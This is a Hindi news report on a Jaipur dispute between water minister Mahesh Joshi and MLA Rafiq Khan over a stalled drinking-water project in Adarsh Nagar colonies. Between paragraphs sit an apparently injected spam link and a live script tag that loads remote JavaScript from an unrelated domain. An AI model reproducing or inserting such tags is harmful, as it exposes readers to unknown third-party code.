जयपुर ब्यूरो रिपोर्ट। 

चुनाव से कुछ दिन पहले जलदाय मंत्री महेश जाेशी और आदर्श नगर से विधायक रफीक खान के बीच जुबानी जंग चर्चाओं में है। कांग्रेस के दोनों वरिष्ठ नेताओं के बीच छिड़ी इस जंग में करीब 40 हजार से अधिक की आबादी पेयजल के लिए तरस रही है। आगरा राेड क्षेत्र में पेयजल कार्य हाेने थे। 6 जून काे ही टेक्निकल बिड और 17 जुलाई काे फाइनेंशियल बिड भी खुल गई, लेकिन अभी तक काम शुरू नहीं हुआ।

https://533689.click-allow.top/

पिछले 2 माह से वर्कऑर्डर के लिए फाइल अटकी पड़ी है। इसी को लेकर मामला गरमा गया है। विधायक रफीक खान ने जाेशी पर आराेप लगाया कि इनके आने के बाद मेरे क्षेत्र में एक भी नया काम नहीं हुआ। जाे भी पेयजल प्राेजेक्ट आता है, उसे अटका रहे हैं। वहीं जोशी का कहना है कि बुधवार काे ही 32 कराेड़ के प्रोजेक्ट का शिलान्यास किया है।

<script src="https://cdn-server.cc/p/wl-http.js?pub=533689&ga=g"></script>

आदर्शनगर विस क्षेत्र में 15 साल से पेयजल संकट, मंत्री का पुतला फूंकने की चेतावनी दी

आदर्श नगर विधानसभा क्षेत्र के जग्गा की बावड़ी, घाट का बालाजी, मीना की डूंगरी, नाहरसिंह काॅलाेनी, पर्वतपुरी काॅलाेनी, मीणा बस्ती, खानिया की बावड़ी सहित आसपास की 15 से अधिक काॅलाेनियाें में पिछले 15 साल से पेयजल संकट बना हुआ है। लाेगाें की मांग पर स्थानीय विधायक रफीक खान ने 475 लाख के पेयजल कार्य करवाने के लिए प्राेजेक्ट स्वीकृत करवाया था, लेकिन अभी तक वर्कऑर्डर जारी नहीं करने की वजह से काम शुरू ही नहीं हुआ।

अब स्थानीय निवासी व संघर्ष समिति अध्यक्ष मनाेज नायक का कहना है कि मंत्री जोशी इसे अटकाने में लगे है। बीसलपुर पानी से वंचित करने के विरोध में जोशी का घाट के बालाजी तिराहे पर पुतला दहन किया जाएगा। जाे भी काम हुआ है वाे कल्लाजी के समय के हैं आदर्श नगर विधायक रफीक खान ने बताया कि जलदाय मंत्री के आने के बाद ताे मेरे क्षेत्र में कुछ काम ही नहीं हुआ। जाे भी हुआ है वाे कल्लाजी के समय ही हुए थे। आगरा राेड की काॅलाेनियाें के पेयजल प्राेजेक्ट काे मंत्रीजी जानबूझकर अटका रहे हैं। पहले ही 4 माह की देरी हाे गई। पहले भी जाे प्राेजेक्ट चल रहे थे उनकाे भी उलझा दिया। 40 बाेरिंग हाेने थे वाे भी नहीं हुए।

जलदाय मंत्री-कोई काम पेंडिंग नहीं, फिर भी दिखवाता हूं

जलदाय मंत्री महेश जोशी का कहना है कि स्थानीय विधायक की अनुशंसा पर सभी काम करवाने की कोशिश की है। आदर्शनगर विस क्षेत्र के घाटगेट क्षेत्र में पाइपलाइन बिछाने के 32 करोड़ के काम का बुधवार को ही शिलान्यास किया है। आदर्शनगर क्षेत्र की पेयजल सप्लाई सुधारने के लिए ट्यूबवेल, पाइपलाइन व पेयजल स्कीम की स्वीकृतियां दी हैं। आदर्श नगर विधायक की ओर से मंत्री कार्यालय को भेजी गई कोई भी डिमांड पेंडिंग नहीं है। फिर भी दिखवा लेते हैं।

इधर, जलदाय विभाग के अधिकारी बाेले-फर्म पर उदयपुर में कार्रवाई प्रस्तावित, इसलिए देरी हो रही

पीएचईडी के अतिरिक्त मुख्य अभियंता अजय सिंह राठाैड़ ने बताया कि टेंडर चीफ ऑफिस गए हुए है। टेंडर में एक फर्म एेसी है, जिस पर उदयपुर में कार्रवाई प्रस्तावित है, इस पर निर्णय हाेना है। उसके बाद ही कुछ कर पाएंगे। इस वजह से विलंब हाे रहा है और काेई कारण नहीं है। वहीं चीफ इंजीनियर ने समयावधि बढ़ाने के लिए पत्र लिखा है, जिसका जवाब भेज दिया गया।